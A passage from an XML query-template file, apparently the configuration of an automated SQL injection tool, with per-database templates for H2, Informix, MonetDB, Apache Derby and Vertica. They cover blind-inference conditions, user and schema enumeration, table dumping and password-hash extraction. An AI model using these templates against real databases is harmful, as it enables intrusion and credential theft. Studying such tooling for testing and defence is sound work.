INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'\" condition=\"table_name\" condition2=\"table_schem\"/>\n            <inband query=\"SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s\" condition=\"table_name\" condition2=\"table_schem\"/>\n        </search_table>\n        <search_column>\n            <blind query=\"SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_schem='%s'\" count=\"SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_schem='%s'\" condition=\"column_name\" condition2=\"table_schem\" condition3=\"table_name\"/>\n            <inband query=\"SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s\" condition=\"column_name\" condition2=\"table_schem\" condition3=\"table_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"H2\">\n        <cast query=\"CAST(%s AS LONGVARCHAR)\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"OFFSET %d LIMIT %d\"/>\n        <limitregexp query=\"\\s+OFFSET\\s+([\\d]+)\\s+LIMIT\\s+([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" OFFSET \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"//\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <hex query=\"RAWTOHEX(%s)\"/>\n        <inference query=\"ASCII(SUBSTR((%s),%d,1))>%d\"/>\n        <banner query=\"H2VERSION()\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"DATABASE()\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"SELECT CURRENT_USER='SA'\"/>\n        <check_udf/>\n        <users>\n            <inband query=\"SELECT NAME FROM INFORMATION_SCHEMA.USERS\"/>\n            <blind query=\"SELECT NAME FROM INFORMATION_SCHEMA.USERS OFFSET %d LIMIT 1\" count=\"SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS\"/>\n        </users>\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n            <blind query=\"SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA OFFSET %d LIMIT 1\" count=\"SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES\" condition=\"TABLE_SCHEMA\"/>\n            <blind query=\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'\"/>\n        </tables>\n        <columns>\n            <blind query=\"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME\" query2=\"SELECT TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND TABLE_SCHEMA='%s'\" count=\"SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'\" condition=\"COLUMN_NAME\"/>\n            <inband query=\"SELECT COLUMN_NAME,TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME\" condition=\"COLUMN_NAME\"/>\n        </columns>\n        <dump_table>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n        </dump_table>\n        <search_db>\n            <blind query=\"SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" count=\"SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"SCHEMA_NAME\"/>\n            <inband query=\"SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"SCHEMA_NAME\"/>\n        </search_db>\n        <search_table>\n            <blind query=\"SELECT DISTINCT(TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES WHERE %s ORDER BY 1\" query2=\"SELECT DISTINCT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' ORDER BY 1\" count=\"SELECT COUNT(DISTINCT(TABLE_SCHEMA)) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLE_NAME)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'\" condition=\"TABLE_NAME\" condition2=\"TABLE_SCHEMA\"/>\n            <inband query=\"SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE %s\" condition=\"TABLE_NAME\" condition2=\"TABLE_SCHEMA\"/>\n        </search_table>\n        <search_column>\n            <blind query=\"SELECT DISTINCT(TABLE_SCHEMA) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY 1\" query2=\"SELECT DISTINCT(TABLE_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s' ORDER BY 1\" count=\"SELECT COUNT(DISTINCT(TABLE_SCHEMA)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLE_NAME)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s'\" condition=\"column_name\" condition2=\"TABLE_SCHEMA\" condition3=\"TABLE_NAME\"/>\n            <inband query=\"SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" condition=\"COLUMN_NAME\" condition2=\"TABLE_SCHEMA\" condition3=\"TABLE_NAME\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Informix\">\n        <cast query=\"RTRIM(TO_CHAR(%s))\"/>\n        <length query=\"CHAR_LENGTH(RTRIM(%s))\"/>\n        <isnull query=\"NVL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"SELECT SKIP %d LIMIT 1\"/>\n        <limitregexp query=\"\\s+SKIP\\s+([\\d]+)\\s*LIMIT\\s*([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL\"/>\n        <!-- NOTE: HEX() only accepts integer values -->\n        <!-- <hex query=\"HEX(%s)\"/> -->\n        <!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->\n        <inference query=\"ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d\"/>\n        <banner query=\"SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL\"/>\n        <current_user query=\"SELECT USER FROM SYSMASTER:SYSDUAL\"/>\n        <current_db query=\"SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL\"/>\n        <hostname query=\"SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL\"/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'\"/>\n        <users>\n            <inband query=\"SELECT USERNAME FROM SYSUSERS\"/>\n            <blind query=\"SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME\" count=\"SELECT COUNT(USERNAME) FROM SYSUSERS\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS\" condition=\"USERNAME\"/>\n            <blind query=\"SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'\"/>\n        </passwords>\n        <privileges>\n            <inband query=\"SELECT USERNAME,USERTYPE FROM SYSUSERS\" condition=\"USERNAME\"/>\n            <blind query=\"SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT NAME FROM SYSMASTER:SYSDATABASES\"/>\n            <blind query=\"SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME\" count=\"SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99\"/>\n            <blind query=\"SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME\" count=\"SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'\" condition=\"COLNAME\"/>\n            <blind query=\"SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME\" query2=\"SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'\" count=\"SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'\"  condition=\"COLNAME\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s:%s\"/>\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE RTRIM(TO_CHAR(%s))>'%s'\" query2=\"SELECT MAX(%s) FROM %s WHERE RTRIM(TO_CHAR(%s)) LIKE '%s'\" count=\"SELECT COUNT(*) FROM %s:%s\" count2=\"SELECT COUNT(DISTINCT %s) FROM %s\"/>\n        </dump_table>\n        <search_db/>\n        <search_table/>\n        <search_column/>\n    </dbms>\n\n    <dbms value=\"MonetDB\">\n        <cast query=\"CAST(%s AS VARCHAR(4000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d OFFSET %d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*OFFSET\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"#\"/>\n        <substring query=\"SUBSTRING((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <inference query=\"ASCII(SUBSTRING((%s),%d,1))>%d\"/>\n        <banner query=\"SELECT value FROM environment WHERE name='monet_version'\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"SELECT CURRENT_SCHEMA\" query2=\"SELECT value FROM environment WHERE name='gdk_dbname'\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"(SELECT grantor FROM auths WHERE name=CURRENT_USER)=0\"/>\n        <check_udf/>\n        <users>\n            <inband query=\"SELECT name FROM sys.users\"/>\n            <!-- NOTE: LIMIT %d OFFSET %d not supported inside subqueries -->\n            <blind query=\"SELECT name FROM (SELECT name,row_number() over() AS y FROM sys.users)x WHERE x.y-1=%d\" count=\"SELECT COUNT(name) FROM sys.users\"/>\n        </users>\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT name FROM schemas\"/>\n            <blind query=\"SELECT name FROM (SELECT name,row_number() over() AS y FROM sys.schemas)x WHERE x.y-1=%d\" count=\"SELECT COUNT(DISTINCT(name)) FROM schemas\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT schemas.name,tables.name FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false\"/>\n            <blind query=\"SELECT name FROM (SELECT tables.name,row_number() over() AS y FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s')x WHERE x.y-1=%d\" count=\"SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT name,type FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s' AND tables.id=table_id)\" condition=\"name\"/>\n            <blind query=\"SELECT name FROM (SELECT name,row_number() over() AS y FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s'))x WHERE x.y-1=%d\" query2=\"SELECT type FROM columns WHERE name='%s' AND table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s')\" count=\"SELECT COUNT(name) FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s')\" condition=\"name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s\"/>\n            <blind query=\"SELECT z FROM (SELECT %s AS z,row_number() over() AS y FROM %s.%s)x WHERE x.y-1=%d\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schemas.name FROM schemas WHERE %s\" condition=\"schemas.name\"/>\n            <blind query=\"SELECT DISTINCT(schemas.name) FROM schemas WHERE %s\" count=\"SELECT COUNT(DISTINCT(schemas.name)) FROM schemas WHERE %s\" condition=\"schemas.name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT schemas.name,tables.name FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND %s\" condition=\"tables.name\" condition2=\"schemas.name\"/>\n            <blind query=\"SELECT DISTINCT(schemas.name) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND %s\" query2=\"SELECT DISTINCT(tables.name) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'\" count=\"SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'\" count2=\"SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'\" condition=\"tables.name\" condition2=\"schemas.name\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT schemas.name,tables.name FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s\" condition=\"columns.name\" condition2=\"schemas.name\" condition3=\"tables.name\"/>\n            <blind query=\"SELECT DISTINCT(schemas.name) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s\" query2=\"SELECT DISTINCT(tables.name) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE schemas.name='%s'\" count=\"SELECT COUNT(DISTINCT(schemas.name)) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s\" count2=\"SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE schemas.name='%s'\" condition=\"columns.name\" condition2=\"schemas.name\" condition3=\"tables.name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Apache Derby\">\n        <!-- NOTE: CHAR(%s) causes 'A truncation error was encountered trying to shrink CHAR' -->\n        <cast query=\"RTRIM(CAST(%s AS CHAR(254)))\"/>\n        <length query=\"LENGTH(RTRIM(CAST(%s AS CHAR(254))))\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"{LIMIT %d OFFSET %d}\"/>\n        <limitregexp query=\"{LIMIT\\s+([\\d]+)\\s+OFFSET\\s+([\\d]+)}\"/>\n        <limitgroupstart query=\"2\"/>\n        <limitgroupstop query=\"1\"/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <!-- NOTE: comment without alphanumeric char in continuation is invalid -->\n        <comment query=\"--x\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <!-- NOTE: Apache Derby does not support implicit conversion from int to string -->\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1\"/>\n        <inference query=\"SUBSTR((%s),%d,1)>'%c'\"/>\n        <banner/>\n        <current_user query=\"SELECT USER FROM SYSIBM.SYSDUMMY1\"/>\n        <current_db query=\"SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <!-- NOTE: ERROR 4251D: Only the database owner can perform this operation. -->\n        <is_dba query=\"(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0\"/>\n        <dbs>\n            <inband query=\"SELECT SCHEMANAME FROM SYS.SYSSCHEMAS\"/>\n            <blind query=\"SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}\" count=\"SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID\" condition=\"SCHEMANAME\"/>\n            <blind query=\"SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}\" count=\"SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'\"/>\n        </tables>\n        <columns>\n            <!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->\n            <inband query=\"SELECT COLUMNNAME,RTRIM(CAST(COLUMNDATATYPE AS CHAR(254))) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'\" condition=\"COLUMNNAME\"/>\n            <blind query=\"SELECT COLUMNNAME FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'\" query2=\"SELECT COLUMNDATATYPE FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND COLUMNNAME='%s' AND SCHEMANAME='%s'\" count=\"SELECT COUNT(COLUMNNAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'\" condition=\"COLUMNNAME\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT %s FROM %s {LIMIT 1 OFFSET %d}\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <users>\n            <inband query=\"SELECT USERNAME FROM SYS.SYSUSERS\"/>\n            <blind query=\"SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}\" count=\"SELECT COUNT(USERNAME) FROM SYS.SYSUSERS\"/>\n        </users>\n        <!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <search_db>\n            <inband query=\"SELECT SCHEMANAME FROM SYS.SYSSCHEMAS WHERE %s\" condition=\"SCHEMANAME\"/>\n            <blind query=\"SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSSCHEMAS WHERE %s\" count=\"SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSSCHEMAS WHERE %s\" condition=\"SCHEMANAME\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" condition=\"TABLENAME\" condition2=\"SCHEMANAME\"/>\n            <blind query=\"SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" query2=\"SELECT DISTINCT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'\" count=\"SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLENAME)) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'\" condition=\"TABLENAME\" condition2=\"SCHEMANAME\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT SCHEMANAME,TABLENAME FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" condition=\"COLUMNNAME\" condition2=\"SCHEMANAME\" condition3=\"TABLENAME\"/>\n            <blind query=\"SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" count=\"SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" query2=\"SELECT DISTINCT(TABLENAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLENAME)) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'\" condition=\"COLUMNNAME\" condition2=\"SCHEMANAME\" condition3=\"TABLENAME\"/>\n        </search_column>\n   </dbms>\n\n    <dbms value=\"Vertica\">\n        <cast query=\"CAST(%s AS CHARACTER(10000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"OFFSET %d LIMIT %d\"/>\n        <limitregexp query=\"\\s+OFFSET\\s+([\\d]+)\\s+LIMIT\\s+([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" OFFSET \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <substring query=\"SUBSTRING((%s) FROM %d FOR %d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <!-- NOTE: requires >=9.1.1 because of 'cannot cast type varchar to varbinary' -->\n        <hex query=\"TO_HEX((%s)::varbinary)\"/>\n        <inference query=\"ASCII(SUBSTRING((%s)::varchar FROM %d FOR 1))>%d\"/>\n        <banner query=\"VERSION()\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"CURRENT_SCHEMA()\"/>\n        <hostname query=\"SELECT MIN(node_name) FROM v_catalog.nodes\"/>\n        <table_comment query=\"SELECT comment FROM v_catalog.comments WHERE object_type='TABLE' AND object_schema='%s' AND object_name='%s'\"/>\n        <!-- NOTE: Vertica uses \"projection columns\" in case of column comments (e.g. testusers_super.surname) -->\n        <column_comment query=\"SELECT comment FROM v_catalog.comments WHERE object_type='COLUMN' AND object_schema='%s' AND object_name LIKE '%.%s'\"/>\n        <is_dba query=\"(SELECT is_super_user FROM v_catalog.users WHERE user_name=CURRENT_USER OFFSET 0 LIMIT 1)\"/>\n        <check_udf query=\"(SELECT procedure_name='%s' FROM v_catalog.user_procedures WHERE procedure_name='%s' OFFSET 0 LIMIT 1)\"/>\n        <users>\n            <inband query=\"SELECT user_name FROM v_catalog.users\"/>\n            <blind query=\"SELECT user_name FROM v_catalog.users OFFSET %d LIMIT 1\" count=\"SELECT COUNT(user_name) FROM v_catalog.users\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT user_name,password FROM v_catalog.passwords\" condition=\"user_name\"/>\n            <blind query=\"SELECT password FROM v_catalog.passwords WHERE user_name='%s' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(password) FROM v_catalog.passwords WHERE user_name='%s'\"/>\n        </passwords>\n        <privileges>\n            <inband query=\"SELECT grantee,privileges_description FROM v_catalog.grants WHERE object_type!='PROCEDURE'\" condition=\"grantee\"/>\n            <!-- NOTE: Vertica does not cache DISTINCT queries (must use ORDER BY to have consistent results) -->\n            <blind query=\"SELECT DISTINCT(privileges_description) FROM v_catalog.grants WHERE grantee='%s' ORDER BY 1 LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(DISTINCT(privileges_description)) FROM grants WHERE grantee='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements>\n            <inband query=\"SELECT current_statement FROM v_monitor.sessions\"/>\n            <blind query=\"SELECT DISTINCT(current_statement) FROM v_monitor.sessions ORDER BY 1 OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(current_statement)) FROM v_monitor.sessions\"/>\n        </statements>\n        <dbs>\n            <inband 